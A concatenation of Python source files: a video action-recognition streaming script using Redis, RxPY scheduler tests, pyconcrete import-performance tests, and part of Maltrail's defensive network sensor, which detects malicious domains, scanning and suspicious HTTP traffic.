tmp_stack_frames.append(frame)
append_frame = time.time()
print("[APPENDING ONE FRAME EACH]: ", append_frame-new_frame)
else:
print("DONE READING ", item)
ready_to_infer = time.time()
rst = make_infer(args.rgb_weights, tmp_stack_frames[1:], rgb_net, 'RGB', args.test_segments, num_class)
inferred = time.time()
print("[TIME WHEN ALL FRAMES ARE READY]:{}, [INF TIME]: {}".format(ready_to_infer-before_opening_cap, inferred-ready_to_infer))
tmp_rst = np.argmax(np.mean(rst, axis=0))
print(make_hmdb()[tmp_rst])
break
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Sending streaming images from pi to hub')
parser.add_argument('--video_path', type=str)
parser.add_argument('--hub_device', type=str, help='Specify where this will be run')
parser.add_argument('--rgb_weights', type=str)
parser.add_argument('--dataset', type=str, default='ucf101')
parser.add_argument('--arch', type=str, default='BNInception')
parser.add_argument('--crop_fusion_type', type=str, default='avg', choices=['avg', 'max', 'topk'])
parser.add_argument('--dropout', type=float, default=0.7)
parser.add_argument('--test_segments', type=int, default=5)
args = parser.parse_args()
if args.dataset == 'ucf101':
num_class = 101
elif args.dataset == 'hmdb51':
num_class = 51
else:
raise ValueError('Unknown dataset' + args.dataset)
rgb_net = TSN(num_class, 1, 'RGB',
base_model=args.arch,
consensus_type=args.crop_fusion_type,
dropout=args.dropout)
rgb_checkpoint = torch.load(args.rgb_weights)
print("model epoch {} best prec@1: {}".format(rgb_checkpoint['epoch'], rgb_checkpoint['best_prec1']))
base_dict = {'.'.join(k.split('.')[1:]): v for k,v in list(rgb_checkpoint['state_dict'].items())}
rgb_net.load_state_dict(base_dict)
output = []
label = []
redis_queue = Queue()
need_stop = Event()
host_address = '147.46.219.146'
redis = Redis(host_address)
redis.flushall()
if args.hub_device == 'Hub':
import shutil
shutil.rmtree('./video')
os.mkdir('./video')
jobs = [ Thread(target=receive_and_save, args=(rgb_net, redis)),
Thread(target=read_file_and_run)]
else:
jobs = [ Thread(target=streaming, args=(args.video_path, need_stop))]
[job.start() for job in jobs]
[job.join() for job in jobs]
print("Terminating..")
if args.hub_device == 'Hub':
cf = confusion_matrix(label, output).astype(float)
cls_cnt = cf.sum(axis=1)
cls_hit = np.diag(cf)
print("CLS CNT, HIT", cls_cnt, cls_hit)
cls_acc = cls_hit / cls_cnt
print('Accuracy {:.02f}%'.format(np.mean(cls_acc) * 100))
|
test_immediatescheduler.py
|
import pytest
import unittest
import threading
from datetime import timedelta
from time import sleep
from rx.disposable import Disposable
from rx.scheduler import ImmediateScheduler
from rx.internal.basic import default_now
from rx.internal.constants import DELTA_ZERO
from rx.internal.exceptions import WouldBlockException
class TestImmediateScheduler(unittest.TestCase):
def test_immediate_singleton(self):
scheduler = [
ImmediateScheduler(),
ImmediateScheduler.singleton()
]
assert scheduler[0] is scheduler[1]
gate = [threading.Semaphore(0), threading.Semaphore(0)]
scheduler = [None, None]
def run(idx):
scheduler[idx] = ImmediateScheduler()
gate[idx].release()
for idx in (0, 1):
threading.Thread(target=run, args=(idx,)).start()
gate[idx].acquire()
assert scheduler[0] is not None
assert scheduler[1] is not None
assert scheduler[0] is scheduler[1]
def test_immediate_extend(self):
class MyScheduler(ImmediateScheduler):
pass
scheduler = [
MyScheduler(),
MyScheduler.singleton(),
ImmediateScheduler.singleton(),
]
assert scheduler[0] is scheduler[1]
assert scheduler[0] is not scheduler[2]
def test_immediate_now(self):
scheduler = ImmediateScheduler()
diff = scheduler.now - default_now()
assert abs(diff) <= timedelta(milliseconds=1)
def test_immediate_now_units(self):
scheduler = ImmediateScheduler()
diff = scheduler.now
sleep(1.1)
diff = scheduler.now - diff
assert timedelta(milliseconds=1000) < diff < timedelta(milliseconds=1300)
def test_immediate_scheduleaction(self):
scheduler = ImmediateScheduler()
ran = False
def action(scheduler, state=None):
nonlocal ran
ran = True
scheduler.schedule(action)
assert ran
def test_immediate_schedule_action_error(self):
scheduler = ImmediateScheduler()
class MyException(Exception):
pass
def action(scheduler, state=None):
raise MyException()
with pytest.raises(MyException):
return scheduler.schedule(action)
def test_immediate_schedule_action_due_error(self):
scheduler = ImmediateScheduler()
ran = False
def action(scheduler, state=None):
nonlocal ran
ran = True
with pytest.raises(WouldBlockException):
scheduler.schedule_relative(0.1, action)
assert ran is False
def test_immediate_simple1(self):
scheduler = ImmediateScheduler()
xx = 0
def action(scheduler, state=None):
nonlocal xx
xx = state
return Disposable()
scheduler.schedule(action, 42)
assert xx == 42
def test_immediate_simple2(self):
scheduler = ImmediateScheduler()
xx = 0
def action(scheduler, state=None):
nonlocal xx
xx = state
return Disposable()
scheduler.schedule_absolute(default_now(), action, 42)
assert xx == 42
def test_immediate_simple3(self):
scheduler = ImmediateScheduler()
xx = 0
def action(scheduler, state=None):
nonlocal xx
xx = state
return Disposable()
scheduler.schedule_relative(DELTA_ZERO, action, 42)
assert xx == 42
def test_immediate_recursive1(self):
scheduler = ImmediateScheduler()
xx = 0
yy = 0
def action(scheduler, state=None):
nonlocal xx
xx = state
def inner_action(scheduler, state=None):
nonlocal yy
yy = state
return Disposable()
return scheduler.schedule(inner_action, 43)
scheduler.schedule(action, 42)
assert xx == 42
assert yy == 43
def test_immediate_recursive2(self):
scheduler = ImmediateScheduler()
xx = 0
yy = 0
def action(scheduler, state=None):
nonlocal xx
xx = state
def inner_action(scheduler, state=None):
nonlocal yy
yy = state
return Disposable()
return scheduler.schedule_absolute(default_now(), inner_action, 43)
scheduler.schedule_absolute(default_now(), action, 42)
assert xx == 42
assert yy == 43
def test_immediate_recursive3(self):
scheduler = ImmediateScheduler()
xx = 0
yy = 0
def action(scheduler, state=None):
nonlocal xx
xx = state
def inner_action(scheduler, state):
nonlocal yy
yy = state
return Disposable()
return scheduler.schedule_relative(DELTA_ZERO, inner_action, 43)
scheduler.schedule_relative(DELTA_ZERO, action, 42)
assert xx == 42
assert yy == 43
|
test_pye_performance.py
|
#!/usr/bin/env python
#
# Copyright 2015 Falldog Hsieh <falldog7@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import time
import logging
import unittest
from zipfile import ZipFile
from multiprocessing import Process, Queue
from os.path import dirname, abspath, join
from test import base
CUR_DIR = abspath(dirname(__file__))
ROOT_DIR = abspath(join(CUR_DIR, '..'))
DATA_DIR = join(CUR_DIR, 'data')
REQUEST_ZIP = join(DATA_DIR, 'requests-2.12.4.zip')
REQUEST_MAIN = join(DATA_DIR, 'main_requests.py')
PYADMIN_PATH = join(ROOT_DIR, 'pyconcrete-admin.py')
RUN_COUNT = int(os.environ.get('TEST_PYE_PERFORMANCE_COUNT', '5'))
logger = logging.getLogger('pyconcrete')
def main_requests(import_concrete, q):
"""
testing main function for multiprocessing
purpose: testing import without exception
"""
if import_concrete:
import pyconcrete
t = time.time()
import requests
from requests.adapters import HTTPAdapter
from requests.auth import HTTPDigestAuth, _basic_auth_str
from requests.compat import (Morsel, cookielib, getproxies, str, urljoin, urlparse, is_py3, builtin_str)
from requests.cookies import cookiejar_from_dict, morsel_to_cookie
from requests.exceptions import (
ConnectionError, ConnectTimeout, InvalidSchema, InvalidURL, MissingSchema, ReadTimeout, Timeout, RetryError
)
from requests.models import PreparedRequest
from requests.structures import CaseInsensitiveDict
from requests.sessions import SessionRedirectMixin
from requests.models import urlencode
from requests.hooks import default_hooks
t = time.time() - t
q.put(requests.__file__)
q.put(t)
@unittest.skipIf(not os.path.exists(REQUEST_ZIP), "requests zip file doesn't exists")
class TestPerformance(base.TestPyConcreteBase):
def setUp(self):
super(TestPerformance, self).setUp()
zip = ZipFile(REQUEST_ZIP)
zip.extractall(self.tmp_dir)
zip.close()
self.req_dir = join(self.tmp_dir, 'requests')
base.touch(join(self.req_dir, '__init__.py'))
def _test_requests(self, import_concrete):
sys.path.insert(0, self.req_dir)
q = Queue()
p = Process(target=main_requests, args=(import_concrete, q))
p.start()
path = q.get(timeout=5)
t = q.get(timeout=2)
p.join()
self.assertTrue(path.startswith(self.req_dir), "wrong import path of requests = %s" % path)
return t
def test_requests_pye(self):
self.lib_compile_pye(self.req_dir, remove_py=True, remove_pyc=True)
t = 0.0
for i in range(RUN_COUNT):
t += self._test_requests(True)
logger.info('test import request (pye) [count=%d] total time = %.2f, avg time = %.2f' % (RUN_COUNT, t, t/RUN_COUNT))
def test_requests_pyc(self):
self.lib_compile_pyc(self.req_dir, remove_py=True)
t = 0.0
for i in range(RUN_COUNT):
t += self._test_requests(False)
logger.info('test import request (pyc) [count=%d] total time = %.2f, avg time = %.2f' % (RUN_COUNT, t, t/RUN_COUNT))
def test_requests_pyc_with_import_hooker(self):
self.lib_compile_pyc(self.req_dir, remove_py=True)
t = 0.0
for i in range(RUN_COUNT):
t += self._test_requests(True)
logger.info('test import request (pyc) (import hooker) [count=%d] total time = %.2f, avg time = %.2f' % (RUN_COUNT, t, t/RUN_COUNT))
def test_requests_py(self):
t = 0.0
for i in range(RUN_COUNT):
t += self._test_requests(False)
logger.info('test import request (py) [count=%d] total time = %.2f, avg time = %.2f' % (RUN_COUNT, t, t/RUN_COUNT))
def test_requests_py_with_import_hooker(self):
t = 0.0
for i in range(RUN_COUNT):
t += self._test_requests(True)
logger.info('test import request (py) (import hooker) [count=%d] total time = %.2f, avg time = %.2f' % (RUN_COUNT, t, t/RUN_COUNT))
if __name__ == '__main__':
unittest.main()
|
sensor.py
|
#!/usr/bin/env python
"""
Copyright (c) 2014-2022 Maltrail developers (https://github.com/stamparm/maltrail/)
See the file 'LICENSE' for copying permission
"""
from __future__ import print_function # Requires: Python >= 2.6
import sys
sys.dont_write_bytecode = True
import cProfile
import inspect
import math
import mmap
import optparse
import os
import platform
import re
import socket
import subprocess
import struct
import threading
import time
import traceback
import warnings
from core.addr import inet_ntoa6
from core.addr import addr_port
from core.attribdict import AttribDict
from core.common import check_connection
from core.common import check_sudo
from core.common import check_whitelisted
from core.common import get_ex_message
from core.common import get_text
from core.common import is_local
from core.common import load_trails
from core.common import patch_parser
from core.compat import xrange
from core.datatype import LRUDict
from core.enums import BLOCK_MARKER
from core.enums import CACHE_TYPE
from core.enums import PROTO
from core.enums import TRAIL
from core.log import create_log_directory
from core.log import flush_condensed_events
from core.log import get_error_log_handle
from core.log import log_error
from core.log import log_event
from core.parallel import worker
from core.parallel import write_block
from core.settings import config
from core.settings import CAPTURE_TIMEOUT
from core.settings import CHECK_CONNECTION_MAX_RETRIES
from core.settings import CONFIG_FILE
from core.settings import CONSONANTS
from core.settings import DLT_OFFSETS
from core.settings import DNS_EXHAUSTION_THRESHOLD
from core.settings import GENERIC_SINKHOLE_REGEX
from core.settings import HOMEPAGE
from core.settings import HOURLY_SECS
from core.settings import HTTP_TIME_FORMAT
from core.settings import IGNORE_DNS_QUERY_SUFFIXES
from core.settings import IPPROTO_LUT
from core.settings import IS_WIN
from core.settings import LOCALHOST_IP
from core.settings import LOCAL_SUBDOMAIN_LOOKUPS
from core.settings import MAX_CACHE_ENTRIES
from core.settings import MMAP_ZFILL_CHUNK_LENGTH
from core.settings import NAME
from core.settings import NO_SUCH_NAME_COUNTERS
from core.settings import NO_SUCH_NAME_PER_HOUR_THRESHOLD
from core.settings import INFECTION_SCANNING_THRESHOLD
from core.settings import PORT_SCANNING_THRESHOLD
from core.settings import POTENTIAL_INFECTION_PORTS
from core.settings import read_config
from core.settings import REGULAR_SENSOR_SLEEP_TIME
from core.settings import SNAP_LEN
from core.settings import SUSPICIOUS_CONTENT_TYPES
from core.settings import SUSPICIOUS_DIRECT_DOWNLOAD_EXTENSIONS
from core.settings import SUSPICIOUS_DIRECT_IP_URL_REGEX
from core.settings import SUSPICIOUS_DOMAIN_CONSONANT_THRESHOLD
from core.settings import SUSPICIOUS_DOMAIN_ENTROPY_THRESHOLD
from core.settings import SUSPICIOUS_DOMAIN_LENGTH_THRESHOLD
from core.settings import SUSPICIOUS_HTTP_PATH_REGEXES
from core.settings import SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION
from core.settings import SUSPICIOUS_HTTP_REQUEST_REGEXES
from core.settings import SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS
from core.settings import SUSPICIOUS_PROXY_PROBE_PRE_CONDITION
from core.settings import SUSPICIOUS_UA_REGEX
from core.settings import VALID_DNS_NAME_REGEX
from core.settings import trails
from core.settings import VERSION
from core.settings import WEB_SCANNING_THRESHOLD
from core.settings import WHITELIST
from core.settings import WHITELIST_DIRECT_DOWNLOAD_KEYWORDS
from core.settings import WHITELIST_LONG_DOMAIN_NAME_KEYWORDS
from core.settings import WHITELIST_HTTP_REQUEST_PATHS
from core.settings import WHITELIST_UA_REGEX
from core.update import update_ipcat
from core.update import update_trails
from thirdparty import six
from thirdparty.six.moves import urllib as _urllib
warnings.filterwarnings(action="ignore", category=DeprecationWarning) # NOTE: https://github.com/helpsystems/pcapy/pull/67/files
_buffer = None
_caps = []
_connect_sec = 0
_connect_src_dst = {}
_connect_src_details = {}
_path_src_dst = {}
_path_src_dst_details = {}
_count = 0
_locks = AttribDict()
_multiprocessing = None
_n = None
_result_cache = LRUDict(MAX_CACHE_ENTRIES)
_local_cache = LRUDict(MAX_CACHE_ENTRIES)
_last_syn = None
_last_logged_syn = None
_last_udp = None
_last_logged_udp = None
_done_count = 0
_done_lock = threading.Lock()
_subdomains = {}
_subdomains_sec = None
_dns_exhausted_domains = set()
class _set(set):
pass
try:
import pcapy
except ImportError:
if IS_WIN:
exit("[!] please install 'WinPcap' (e.g. 'http://www.winpcap.org/install/') and Pcapy (e.g. 'https://breakingcode.wordpress.com/?s=pcapy')")
else:
msg = "[!] please install 'Pcapy' (e.g. 'sudo pip%s install pcapy-ng')" % ('3' if six.PY3 else '2')
exit(msg)
def _check_domain_member(query, domains):
parts = query.lower().split('.')
for i in xrange(0, len(parts)):
domain = '.'.join(parts[i:])
if domain in domains:
return True
return False
def _check_domain_whitelisted(query):
result = _result_cache.get((CACHE_TYPE.DOMAIN_WHITELISTED, query))
if result is None:
result = _check_domain_member(re.split(r"(?i)[^A-Z0-9._-]", query or "")[0], WHITELIST)
_result_cache[(CACHE_TYPE.DOMAIN_WHITELISTED, query)] = result
return result
def _check_domain(query, sec, usec, src_ip, src_port, dst_ip, dst_port, proto, packet=None):
if query:
query = query.lower()
if ':' in query:
query = query.split(':', 1)[0]
if query.replace('.', "").isdigit(): # IP address
return
if _result_cache.get((CACHE_TYPE.DOMAIN, query)) is False:
return
result = False
if re.search(VALID_DNS_NAME_REGEX, query) is not None and not _check_domain_whitelisted(query):
parts = query.split('.')
if query.endswith(".ip-adress.com"): # Reference: https://www.virustotal.com/gui/domain/ip-adress.com/relations
_ = '.'.join(parts[:-2])
trail = "%s(.ip-adress.com)" % _
if _ in trails:
result = True
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[_][0], trails[_][1]), packet)
if not result:
for i in xrange(0, len(parts)):
domain = '.'.join(parts[i:])
if domain in trails:
if domain == query:
trail = domain
else:
_ = ".%s" % domain
trail = "(%s)%s" % (query[:-len(_)], _)
if not (re.search(r"(?i)\A([rd]?ns|nf|mx|nic)\d*\.", query) and any(_ in trails.get(domain, " ")[0] for _ in ("suspicious", "sinkhole"))): # e.g. ns2.nobel.su
if not ((query == trail or parts[0] == "www") and any(_ in trails.get(domain, " ")[0] for _ in ("dynamic", "free web"))): # e.g. noip.com
result = True
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[domain][0], trails[domain][1]), packet)
break
if not result and config.USE_HEURISTICS:
if len(parts[0]) > SUSPICIOUS_DOMAIN_LENGTH_THRESHOLD and '-' not in parts[0]:
trail = None
if len(parts) > 2:
trail = "(%s).%s" % ('.'.join(parts[:-2]), '.'.join(parts[-2:]))
elif len(parts) == 2:
trail = "(%s).%s" % (parts[0], parts[1])
else:
trail = query
if trail and not any(_ in trail for _ in WHITELIST_LONG_DOMAIN_NAME_KEYWORDS):
result = True
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, "long domain (suspicious)", "(heuristic)"), packet)
if not result and trails._regex:
match = re.search(trails._regex, query)
if match:
group, trail = [_ for _ in match.groupdict().items() if _[1] is not None][0]
candidate = trails._regex.split("(?P<")[int(group[1:]) + 1]
candidate = candidate.split('>', 1)[-1].rstrip('|')[:-1]
if candidate in trails:
result = True
trail = match.group(0)
prefix, suffix = query[:match.start()], query[match.end():]
if prefix:
trail = "(%s)%s" % (prefix, trail)
if suffix:
trail = "%s(%s)" % (trail, suffix)
trail = trail.replace(".)", ").")
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[candidate][0], trails[candidate][1]), packet)
if not result and ".onion." in query:
trail = re.sub(r"(\.onion)(\..*)", r"\1(\2)", query)
_ = trail.split('(')[0]
if _ in trails:
result = True
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[_][0], trails[_][1]), packet)
if result is False:
_result_cache[(CACHE_TYPE.DOMAIN, query)] = False
def _get_local_prefix():
_sources = set(_.split('~')[0] for _ in _connect_src_dst.keys())
_candidates = [re.sub(r"\d+\.\d+\Z", "", _) for _ in _sources]
_ = sorted(((_candidates.count(_), _) for _ in set(_candidates)), reverse=True)
result = _[0][1] if _ else ""
if result:
_result_cache[(CACHE_TYPE.LOCAL_PREFIX, "")] = result
else:
result = _result_cache.get((CACHE_TYPE.LOCAL_PREFIX, ""))
return result or '_'
def _process_packet(packet, sec, usec, ip_offset):
"""
Processes single (raw) IP layer data
"""
global _connect_sec
global _last_syn
global _last_logged_syn
global _last_udp
global _last_logged_udp
global _subdomains_sec
try:
if config.USE_HEURISTICS:
if _locks.connect_sec:
_locks.connect_sec.acquire()
connect_sec = _connect_sec
_connect_sec = sec
if _locks.connect_sec:
_locks.connect_sec.release()
if sec > connect_sec:
for key in _connect_src_dst:
_src_ip, _dst = key.split('~')
if not _dst.isdigit() and len(_connect_src_dst[key]) > PORT_SCANNING_THRESHOLD:
if not check_whitelisted(_src_ip):
_dst_ip = _dst
for _ in _connect_src_details[key]:
log_event((sec, usec, _src_ip, _[2], _dst_ip, _[3], PROTO.TCP, TRAIL.IP, _src_ip, "potential port scanning", "(heuristic)"), packet)
elif len(_connect_src_dst[key]) > INFECTION_SCANNING_THRESHOLD:
_dst_port = _dst
_dst_ip = [_[-1] for _ in _connect_src_details[key]]
_src_port = [_[-2] for _ in _connect_src_details[key]]
if len(_dst_ip) == len(set(_dst_ip)):
if _src_ip.startswith(_get_local_prefix()):
log_event((sec, usec, _src_ip, _src_port[0], _dst_ip[0], _dst_port, PROTO.TCP, TRAIL.PORT, _dst_port, "potential infection", "(heuristic)"), packet)
_connect_src_dst.clear()
_connect_src_details.clear()
for key in _path_src_dst:
if len(_path_src_dst[key]) > WEB_SCANNING_THRESHOLD:
_src_ip, _dst_ip = key.split('~')
_sec, _usec, _src_port, _dst_port, _path = _path_src_dst_details[key].pop()
log_event((_sec, _usec, _src_ip, _src_port, _dst_ip, _dst_port, PROTO.TCP, TRAIL.PATH, "*", "potential web scanning", "(heuristic)"), packet)
_path_src_dst.clear()
_path_src_dst_details.clear()
ip_data = packet[ip_offset:]
ip_version = ord(ip_data[0:1]) >> 4
localhost_ip = LOCALHOST_IP[ip_version]
if ip_version == 0x04: # IPv4
ip_header = struct.unpack("!BBHHHBBH4s4s", ip_data[:20])
fragment_offset = ip_header[4] & 0x1fff
if fragment_offset != 0:
return
iph_length = (ip_header[0] & 0xf) << 2
protocol = ip_header[6]
src_ip = socket.inet_ntoa(ip_header[8])
dst_ip = socket.inet_ntoa(ip_header[9])
elif ip_version == 0x06: # IPv6
# Reference: http://chrisgrundemann.com/index.php/2012/introducing-ipv6-understanding-ipv6-addresses/
ip_header = struct.unpack("!BBHHBB16s16s", ip_data[:40])
iph_length = 40
protocol = ip_header[4]
src_ip = inet_ntoa6(ip_header[6])
dst_ip = inet_ntoa6(ip_header[7])
else:
return
if protocol == socket.IPPROTO_TCP: # TCP
src_port, dst_port, _, _, doff_reserved, flags = struct.unpack("!HHLLBB", ip_data[iph_length:iph_length + 14])
if flags != 2 and config.plugin_functions:
if dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, dst_ip, trails[dst_ip][0], trails[dst_ip][1]), packet, skip_write=True)
elif src_ip in trails and dst_ip != localhost_ip:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet, skip_write=True)
if flags == 2: # SYN set (only)
_ = _last_syn
_last_syn = (sec, src_ip, src_port, dst_ip, dst_port)
if _ == _last_syn: # skip bursts
return
if dst_ip in trails or addr_port(dst_ip, dst_port) in trails:
_ = _last_logged_syn
_last_logged_syn = _last_syn
if _ != _last_logged_syn:
trail = addr_port(dst_ip, dst_port)
if trail not in trails:
trail = dst_ip
if not any(_ in trails[trail][0] for _ in ("attacker",)) and not ("parking site" in trails[trail][0] and dst_port not in (80, 443)):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP if ':' not in trail else TRAIL.IPORT, trail, trails[trail][0], trails[trail][1]), packet)
elif (src_ip in trails or addr_port(src_ip, src_port) in trails) and dst_ip != localhost_ip:
_ = _last_logged_syn
_last_logged_syn = _last_syn
if _ != _last_logged_syn:
trail = addr_port(src_ip, src_port)
if trail not in trails:
trail = src_ip
if not any(_ in trails[trail][0] for _ in ("malware",)):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP if ':' not in trail else TRAIL.IPORT, trail, trails[trail][0], trails[trail][1]), packet)
if config.USE_HEURISTICS:
if dst_ip != localhost_ip:
key = "%s~%s" % (src_ip, dst_ip)
if key not in _connect_src_dst:
_connect_src_dst[key] = set()
_connect_src_details[key] = set()
_connect_src_dst[key].add(dst_port)
_connect_src_details[key].add((sec, usec, src_port, dst_port))
if dst_port in POTENTIAL_INFECTION_PORTS:
key = "%s~%s" % (src_ip, dst_port)
if key not in _connect_src_dst:
_connect_src_dst[key] = set()
_connect_src_details[key] = set()
_connect_src_dst[key].add(dst_ip)
_connect_src_details[key].add((sec, usec, src_port, dst_ip))
else:
tcph_length = doff_reserved >> 4
h_size = iph_length + (tcph_length << 2)
tcp_data = get_text(ip_data[h_size:])
if tcp_data.startswith("HTTP/"):
match = re.search(GENERIC_SINKHOLE_REGEX, tcp_data[:2000])
if match:
trail = match.group(0)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "sinkhole response (malware)", "(heuristic)"), packet)
else:
index = tcp_data.find("<title>")
if index >= 0:
title = tcp_data[index + len("<title>"):tcp_data.find("</title>", index)]
if re.search(r"domain name has been seized by|Domain Seized|Domain Seizure", title):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, title, "seized domain (suspicious)", "(heuristic)"), packet)
content_type = None
first_index = tcp_data.find("\r\nContent-Type:")
if first_index >= 0:
first_index = first_index + len("\r\nContent-Type:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
content_type = tcp_data[first_index:last_index].strip().lower()
if content_type and content_type in SUSPICIOUS_CONTENT_TYPES:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, content_type, "content type (suspicious)", "(heuristic)"), packet)
method, path = None, None
if " HTTP/" in tcp_data:
index = tcp_data.find("\r\n")
if index >= 0:
line = tcp_data[:index]
if line.count(' ') == 2 and " HTTP/" in line:
method, path, _ = line.split(' ')
if method and path:
post_data = None
host = dst_ip
first_index = tcp_data.find("\r\nHost:")
path = path.lower()
if first_index >= 0:
first_index = first_index + len("\r\nHost:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
host = tcp_data[first_index:last_index]
host = host.strip().lower()
if host.endswith(":80"):
host = host[:-3]
if host and host[0].isalpha() and dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, "%s (%s)" % (dst_ip, host.split(':')[0]), trails[dst_ip][0], trails[dst_ip][1]), packet)
elif re.search(r"\A\d+\.[0-9.]+\Z", host or "") and re.search(SUSPICIOUS_DIRECT_IP_URL_REGEX, "%s%s" % (host, path)):
if not dst_ip.startswith(_get_local_prefix()):
trail = "(%s)%s" % (host, path)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "potential iot-malware download (suspicious)", "(heuristic)"), packet)
return
elif config.CHECK_HOST_DOMAINS:
_check_domain(host, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
elif config.USE_HEURISTICS and config.CHECK_MISSING_HOST:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, "%s%s" % (host, path), "missing host header (suspicious)", "(heuristic)"), packet)
index = tcp_data.find("\r\n\r\n")
if index >= 0:
post_data = tcp_data[index + 4:]
url = None
if config.USE_HEURISTICS and path.startswith('/'):
_path = path.split('/')[1]
key = "%s~%s" % (src_ip, dst_ip)
if key not in _path_src_dst:
_path_src_dst[key] = set()
_path_src_dst[key].add(_path)
if key not in _path_src_dst_details:
_path_src_dst_details[key] = set()
_path_src_dst_details[key].add((sec, usec, src_port, dst_port, path))
elif config.USE_HEURISTICS and dst_port == 80 and path.startswith("http://") and any(_ in path for _ in SUSPICIOUS_PROXY_PROBE_PRE_CONDITION) and not _check_domain_whitelisted(path.split('/')[2]):
trail = re.sub(r"(http://[^/]+/)(.+)", r"\g<1>(\g<2>)", path)
trail = re.sub(r"(http://)([^/(]+)", lambda match: "%s%s" % (match.group(1), match.group(2).split(':')[0].rstrip('.')), trail)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "potential proxy probe (suspicious)", "(heuristic)"), packet)
return
elif "://" in path:
unquoted_path = _urllib.parse.unquote(path)
key = "code execution"
if key not in _local_cache:
_local_cache[key] = next(_[1] for _ in SUSPICIOUS_HTTP_REQUEST_REGEXES if "code execution" in _[0])
if re.search(_local_cache[key], unquoted_path, re.I) is None: # NOTE: to prevent malware domain FPs in case of outside scanners
url = path.split("://", 1)[1]
if '/' not in url:
url = "%s/" % url
host, path = url.split('/', 1)
if host.endswith(":80"):
host = host[:-3]
path = "/%s" % path
proxy_domain = host.split(':')[0]
_check_domain(proxy_domain, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
elif method == "CONNECT":
if '/' in path:
host, path = path.split('/', 1)
path = "/%s" % path
else:
host, path = path, '/'
if host.endswith(":80"):
host = host[:-3]
url = "%s%s" % (host, path)
proxy_domain = host.split(':')[0]
_check_domain(proxy_domain, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
if url is None:
url = "%s%s" % (host, path)
if config.USE_HEURISTICS:
user_agent, result = None, None
first_index = tcp_data.find("\r\nUser-Agent:")
if first_index >= 0:
first_index = first_index + len("\r\nUser-Agent:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
user_agent = tcp_data[first_index:last_index]
user_agent = _urllib.parse.unquote(user_agent).strip()
if user_agent:
result = _result_cache.get((CACHE_TYPE.USER_AGENT, user_agent))
if result is None:
if re.search(WHITELIST_UA_REGEX, user_agent, re.I) is None:
match = re.search(SUSPICIOUS_UA_REGEX, user_agent)
if match:
def _(value):
return value.rstrip('\\').replace('(', "\\(").replace(')', "\\)")
parts = user_agent.split(match.group(0), 1)
if len(parts) > 1 and parts[0] and parts[-1]:
result = _result_cache[(CACHE_TYPE.USER_AGENT, user_agent)] = "%s (%s)" % (_(match.group(0)), _(user_agent))
else:
result = _result_cache[(CACHE_TYPE.USER_AGENT, user_agent)] = _(match.group(0)).join(("(%s)" if part else "%s") % _(part) for part in parts)
if not result:
_result_cache[(CACHE_TYPE.USER_AGENT, user_agent)] = False
if result:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.UA, result, "user agent (suspicious)", "(heuristic)"), packet)
if not _check_domain_whitelisted(host):
path = path.replace("//", '/')
unquoted_path = _urllib.parse.unquote(path)
unquoted_post_data = _urllib.parse.unquote(post_data or "")
checks = [path.rstrip('/')]
if '?' in path:
checks.append(path.split('?')[0].rstrip('/'))
if '=' in path:
checks.append(path[:path.index('=') + 1])
_ = re.sub(r"(\w+=)[^&=]+", r"\g<1>", path)
if _ not in checks:
checks.append(_)
if _.count('/') > 1:
checks.append("/%s" % _.split('/')[-1])
elif post_data:
checks.append("%s?%s" % (path, unquoted_post_data.lower()))
if checks[-1].count('/') > 1:
checks.append(checks[-1][:checks[-1].rfind('/')])
checks.append(checks[0][checks[0].rfind('/'):].split('?')[0])
for check in filter(None, checks):
for _ in ("", host):
check = "%s%s" % (_, check)
if check in trails:
if '?' not in path and '?' in check and post_data:
trail = "%s(%s \\(%s %s\\))" % (host, path, method, post_data.strip())
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, trails[check][0], trails[check][1]))
else:
parts = url.split(check)
other = ("(%s)" % _ if _ else _ for _ in parts)
trail = check.join(other)
